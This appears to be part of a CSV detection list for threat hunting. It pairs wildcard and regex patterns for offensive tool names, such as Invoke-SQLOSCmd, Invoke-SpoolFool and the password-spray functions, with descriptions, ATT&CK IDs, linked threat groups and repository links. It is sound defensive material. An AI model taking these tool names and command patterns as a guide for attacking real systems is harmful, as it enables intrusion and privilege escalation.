"*Invoke-SocksProxy*",".{0,1000}Invoke\-SocksProxy.{0,1000}","offensive_tool_keyword","empire","Empire is a 
post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49680" "*Invoke-SocksProxy.ps1*",".{0,1000}Invoke\-SocksProxy\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","49681" "*Invoke-SocksProxy.psm1*",".{0,1000}Invoke\-SocksProxy\.psm1.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server 
using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","49682" "*Invoke-SpawnAs*",".{0,1000}Invoke\-SpawnAs.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49683" "*Invoke-SpoolFool*",".{0,1000}Invoke\-SpoolFool.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","49684" "*Invoke-Spoolsample*",".{0,1000}Invoke\-Spoolsample.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49685" "*Invoke-SpoolSample*",".{0,1000}Invoke\-SpoolSample.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49686" "*Invoke-SpoolSample.ps1*",".{0,1000}Invoke\-SpoolSample\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - 
T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49687" "*Invoke-SprayEmptyPassword*",".{0,1000}Invoke\-SprayEmptyPassword.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49688" "*Invoke-SpraySinglePassword*",".{0,1000}Invoke\-SpraySinglePassword.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","1","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","49689" "*Invoke-SQLAudit*",".{0,1000}Invoke\-SQLAudit.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Scan for MSSQL misconfigurations to escalate to System 
Admin","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49690" "*Invoke-SQLAudit*",".{0,1000}Invoke\-SQLAudit.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49691" "*Invoke-SQLAuditDefaultLoginPw*",".{0,1000}Invoke\-SQLAuditDefaultLoginPw.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49692" "*Invoke-SQLAuditPrivAutoExecSp*",".{0,1000}Invoke\-SQLAuditPrivAutoExecSp.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49693" "*Invoke-SQLAuditPrivCreateProcedure*",".{0,1000}Invoke\-SQLAuditPrivCreateProcedure.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49694" "*Invoke-SQLAuditPrivDbChaining*",".{0,1000}Invoke\-SQLAuditPrivDbChaining.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49695" "*Invoke-SQLAuditPrivImpersonateLogin*",".{0,1000}Invoke\-SQLAuditPrivImpersonateLogin.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49696" "*Invoke-SQLAuditPrivServerLink*",".{0,1000}Invoke\-SQLAuditPrivServerLink.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49697" "*Invoke-SQLAuditPrivTrustworthy*",".{0,1000}Invoke\-SQLAuditPrivTrustworthy.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49698" "*Invoke-SQLAuditPrivXpDirtree*",".{0,1000}Invoke\-SQLAuditPrivXpDirtree.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49699" "*Invoke-SQLAuditPrivXpFileexit*",".{0,1000}Invoke\-SQLAuditPrivXpFileexit.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49700" "*Invoke-SQLAuditSQLiSpExecuteAs*",".{0,1000}Invoke\-SQLAuditSQLiSpExecuteAs.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49701" "*Invoke-SQLAuditSQLiSpSigned*",".{0,1000}Invoke\-SQLAuditSQLiSpSigned.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49702" "*Invoke-SQLAuditWeakLoginPw*",".{0,1000}Invoke\-SQLAuditWeakLoginPw.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49703" "*Invoke-SQLC2Command*",".{0,1000}Invoke\-SQLC2Command.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49704" "*Invoke-SQLDumpInfo*",".{0,1000}Invoke\-SQLDumpInfo.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49705" "*Invoke-SQLDumpInfo*",".{0,1000}Invoke\-SQLDumpInfo.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49706" "*Invoke-SQLEscalatePriv*",".{0,1000}Invoke\-SQLEscalatePriv.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49707" "*Invoke-SQLImpersonateService*",".{0,1000}Invoke\-SQLImpersonateService.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. 
weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49708" "*Invoke-SQLImpersonateServiceCmd*",".{0,1000}Invoke\-SQLImpersonateServiceCmd.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49709" "*Invoke-SQLOSCmd -Instance * -Command *",".{0,1000}Invoke\-SQLOSCmd\s\-Instance\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Run command (enables XP_CMDSHELL automatically if required)","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49710" "*Invoke-SQLOSCMD*",".{0,1000}Invoke\-SQLOSCMD.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49711" "*Invoke-SQLOSCmd*",".{0,1000}Invoke\-SQLOSCmd.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49712" "*Invoke-SQLOSCmd.ps1*",".{0,1000}Invoke\-SQLOSCmd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - 
Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SQLOSCmd.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49713" "*Invoke-SQLOSCmdAgentJob -Verbose -SubSystem *",".{0,1000}Invoke\-SQLOSCmdAgentJob\s\-Verbose\s\-SubSystem\s.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","49714" "*Invoke-SQLOSCmdAgentJob*",".{0,1000}Invoke\-SQLOSCmdAgentJob.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
